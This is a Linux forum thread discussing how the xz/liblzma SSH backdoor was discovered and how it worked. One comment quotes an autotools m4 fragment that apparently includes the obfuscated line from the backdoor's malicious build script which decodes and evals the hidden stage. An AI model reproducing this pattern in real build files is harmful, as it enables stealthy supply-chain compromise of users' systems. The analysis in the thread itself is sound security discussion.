1200
submitted 7 months ago by possiblylinux127@lemmy.zip to c/linux@lemmy.ml
top 50 comments
sorted by: hot top controversial new old
[-] Aatube@kbin.melroy.org 234 points 7 months ago

Don't forget all of this was discovered because ssh was running 0.5 seconds slower

[-] Steamymoomilk@sh.itjust.works 94 points 7 months ago

Its toooo much bloat. There must be malware XD linux users at there peak!

[-] rho50@lemmy.nz 94 points 7 months ago* (last edited 6 months ago)

Tbf 500ms latency on - IIRC - a loopback network connection in a test environment is a lot. It's not hugely surprising that a curious engineer dug into that.

[-] Jolteon@lemmy.zip 80 points 7 months ago

Half a second is a really, really long time.

[-] lurch@sh.itjust.works 25 points 7 months ago

reminds of Data after the Borg Queen incident

load more comments (4 replies)
load more comments (1 replies)
[-] imsodin@infosec.pub 52 points 7 months ago

Technically that wasn't the initial entrypoint, paraphrasing from https://mastodon.social/@AndresFreundTec/112180406142695845 :

It started with ssh using unreasonably much cpu which interfered with benchmarks. Then profiling showed that cpu time being spent in lzma, without being attributable to anything. And he remembered earlier valgrind issues. These valgrind issues only came up because he set some build flag he doesn't even remember anymore why it is set. On top he ran all of this on debian unstable to catch (unrelated) issues early. Any of these factors missing, he wouldn't have caught it. All of this is so nuts.

[-] possiblylinux127@lemmy.zip 47 points 7 months ago

Postgres sort of saved the day

[-] Hupf@feddit.de 21 points 7 months ago
load more comments (1 replies)
[-] oce@jlai.lu 33 points 7 months ago

Is that from the Microsoft engineer or did he start from this observation?

[-] whereisk@lemmy.world 45 points 7 months ago

From what I read it was this observation that led him to investigate the cause. But this is the first time I read that he's employed by Microsoft.

load more comments (6 replies)
[-] merthyr1831@lemmy.world 125 points 7 months ago

I know this is being treated as a social engineering attack, but having unreadable binary blobs as part of your build/dev pipeline is fucking insane.

[-] suy@programming.dev 39 points 7 months ago

Is it, really? If the whole point of the library is dealing with binary files, how are you even going to have automated tests of the library?

The scary thing is that there is people still using autotools, or any other hyper-complicated build system in which this is easy to hide because who the hell cares about learning about Makefiles, autoconf, automake, M4 and shell scripting at once to compile a few C files. I think hiding this in any other build system would have been definitely harder. Check this mess:

  dnl Define somedir_c_make.
  [$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
  dnl Use the substituted somedir variable, when possible, so that the user
  dnl may adjust somedir a posteriori when there are no special characters.
  if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
    [$1]_c_make='\"$([$1])\"'
  fi
  if test "x$gl_am_configmake" != "x"; then
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
  else
    gl_[$1]_config=''
  fi
[-] nxdefiant@startrek.website 26 points 7 months ago* (last edited 7 months ago)

It's not uncommon to keep example bad data around for regression to run against, and I imagine that's not the only example in a compression library, but I'd definitely consider that a level of testing above unittests, and would not include it in the main repo. Tests that verify behavior at run time, either when interacting with the user, integrating with other software or services, or after being packaged, belong elsewhere. In summary, this is lazy.

load more comments (6 replies)
[-] xlash123@sh.itjust.works 24 points 7 months ago

As mentioned, binary test files makes sense for this utility. In the future though, there should be expected to demonstrate how and why the binary files were constructed in this way, kinda like how encryption algorithms explain how they derived any arbitrary or magic numbers. This would bring more trust and transparency to these files without having to eliminate them.

load more comments (1 replies)
load more comments (1 replies)
[-] d3Xt3r@lemmy.nz 98 points 7 months ago

This is informative, but unfortunately it doesn't explain how the actual payload works - how does it compromise SSH exactly?

[-] Aatube@kbin.melroy.org 49 points 7 months ago

It allows a patched SSH client to bypass SSH authentication and gain access to a compromised computer

[-] d3Xt3r@lemmy.nz 66 points 7 months ago* (last edited 7 months ago)

From what I've heard so far, it's NOT an authentication bypass, but a gated remote code execution.

There's some discussion on that here: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

But it would be nice to have a similar digram like OP's to understand how exactly it does the RCE and implements the SSH backdoor. If we understand how, maybe we can take measures to prevent similar exploits in the future.

[-] underisk@lemmy.ml 28 points 7 months ago

I think ideas about prevention should be more concerned with the social engineering aspect of this attack. The code itself is certainly cleverly hidden, but any bad actor who gains the kind of access as Jia did could likely pull off something similar without duplicating their specific method or technique.

load more comments (2 replies)
load more comments (7 replies)
load more comments (2 replies)
[-] UnityDevice@startrek.website 96 points 7 months ago

If this was done by multiple people, I'm sure the person that designed this delivery mechanism is really annoyed with the person that made the sloppy payload, since that made it all get detected right away.

[-] fluxion@lemmy.world 33 points 7 months ago

I hope they are all extremely annoyed and frustrated

[-] acockworkorange@mander.xyz 24 points 7 months ago
load more comments (2 replies)
[-] refreeze@lemmy.world 79 points 7 months ago

I have been reading about this since the news broke and still can't fully wrap my head around how it works. What an impressive level of sophistication.

[-] rockSlayer@lemmy.world 83 points 7 months ago* (last edited 7 months ago)

And due to open source, it was still caught within a month. Nothing could ever convince me more than that how secure FOSS can be.

[-] lung@lemmy.world 94 points 7 months ago

Idk if that's the right takeaway, more like 'oh shit there's probably many of these long con contributors out there, and we just happened to catch this one because it was a little sloppy due to the 0.5s thing'

This shit got merged. Binary blobs and hex digit replacements. Into low level code that many things use. Just imagine how often there's no oversight at all

[-] rockSlayer@lemmy.world 49 points 7 months ago

Yes, and the moment this broke other project maintainers are working on finding exploits now. They read the same news we do and have those same concerns.

[-] lung@lemmy.world 21 points 7 months ago

Very generous to imagine that maintainers have so much time on their hands

load more comments (2 replies)
[-] Corngood@lemmy.ml 18 points 7 months ago

I wonder if anyone is doing large scale searches for source releases that differ in meaningful ways from their corresponding public repos.

It's probably tough due to autotools and that sort of thing.

[-] Quill7513@slrpnk.net 28 points 7 months ago

I was literally compiling this library a few nights ago and didn't catch shit. We caught this one but I'm sure there's a bunch of "bugs" we've squashes over the years long after they were introduced that were working just as intended like this one.

The real scary thing to me is the notion this was state sponsored and how many things like this might be hanging out in proprietary software for years on end.

load more comments (2 replies)
[-] uis@lemm.ee 69 points 7 months ago
[-] FatTony@lemm.ee 66 points 7 months ago
[-] alphafalcon@feddit.de 34 points 7 months ago

Coconut at least...

load more comments (1 replies)
[-] JoeKrogan@lemmy.world 48 points 7 months ago

I think going forward we need to look at packages with a single or few maintainers as target candidates. Especially if they are as widespread as this one was.

In addition I think security needs to be a higher priority too, no more patching fuzzers to allow that one program to compile. Fix the program.

I'd also love to see systems hardened by default.

[-] Potatos_are_not_friends@lemmy.world 40 points 7 months ago* (last edited 7 months ago)

In the words of the devs in that security email, and I'm paraphrasing -

"Lots of people giving next steps, not a lot people lending a hand."

I say this as a person not lending a hand. This stuff over my head and outside my industry knowledge and experience, even after I spent the whole weekend piecing everything together.

load more comments (1 replies)
[-] amju_wolf@pawb.social 31 points 7 months ago

Packages or dependencies with only one maintainer that are this popular have always been an issue, and not just a security one.

What happens when that person can't afford to or doesn't want to run the project anymore? What if they become malicious? What if they sell out? Etc.

load more comments (2 replies)
load more comments (6 replies)
[-] girlfreddy@lemmy.ca 45 points 7 months ago

A small blurb from The Guardian on why Andres Freund went looking in the first place.

So how was it spotted? A single Microsoft developer was annoyed that a system was running slowly. That’s it. The developer, Andres Freund, was trying to uncover why a system running a beta version of Debian, a Linux distribution, was lagging when making encrypted connections. That lag was all of half a second, for logins. That’s it: before, it took Freund 0.3s to login, and after, it took 0.8s. That annoyance was enough to cause him to break out the metaphorical spanner and pull his system apart to find the cause of the problem.

load more comments (1 replies)
[-] Pantherina@feddit.de 37 points 7 months ago
[-] index@sh.itjust.works 32 points 7 months ago

Give this guy a medal and a mastodon account

load more comments (4 replies)
[-] noddy@beehaw.org 30 points 7 months ago

The scary thing about this is thinking about potential undetected backdoors similar to this existing in the wild. Hopefully the lessons learned from the xz backdoor will help us to prevent similar backdoors in the future.

load more comments (6 replies)
[-] KillingTimeItself@lemmy.dbzer0.com 25 points 7 months ago

this was one hell of an april fools joke i tell you what.

load more comments (2 replies)
[-] luthis@lemmy.nz 21 points 7 months ago

I have heard multiple times from different sources that building from git source instead of using tarballs invalidates this exploit, but I do not understand how. Is anyone able to explain that?

If malicious code is in the source, and therefore in the tarball, what's the difference?

[-] Aatube@kbin.melroy.org 47 points 7 months ago

Because m4/build-to-host.m4, the entry point, is not in the git repo, but was included by the malicious maintainer into the tarballs.

load more comments (8 replies)
[-] harsh3466@lemmy.ml 21 points 7 months ago* (last edited 7 months ago)

I don’t understand the actual mechanics of it, but my understanding is that it’s essentially like what happened with Volkswagon and their diesel emissions testing scheme where it had a way to know it was being emissions tested and so it adapted to that.

The malicious actor had a mechanism that exempted the malicious code when built from source, presumably because it would be more likely to be noticed when building/examining the source.

Edit: a bit of grammar. Also, this is my best understanding based on what I’ve read and videos I’ve watched, but a lot of it is over my head.

load more comments (5 replies)
load more comments (2 replies)
[-] umbrella@lemmy.ml 20 points 7 months ago

did we find out who was that guy and why was he doing that?

[-] intrepid@lemmy.ca 24 points 7 months ago
load more comments (1 replies)
[-] fluxion@lemmy.world 21 points 7 months ago

It was Spez trying to collect more user data to make Reddit profitable

load more comments (2 replies)
load more comments
view more: next ›
this post was submitted on 01 Apr 2024
1200 points (100.0% liked)

Linux

48097 readers
581 users here now

From Wikipedia, the free encyclopedia

Linux is a family of open source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991 by Linus Torvalds. Linux is typically packaged in a Linux distribution (or distro for short).

Distributions include the Linux kernel and supporting system software and libraries, many of which are provided by the GNU Project. Many Linux distributions use the word "Linux" in their name, but the Free Software Foundation uses the name GNU/Linux to emphasize the importance of GNU software, causing some controversy.

Rules

Related Communities

Community icon by Alpár-Etele Méder, licensed under CC BY 3.0

founded 5 years ago
MODERATORS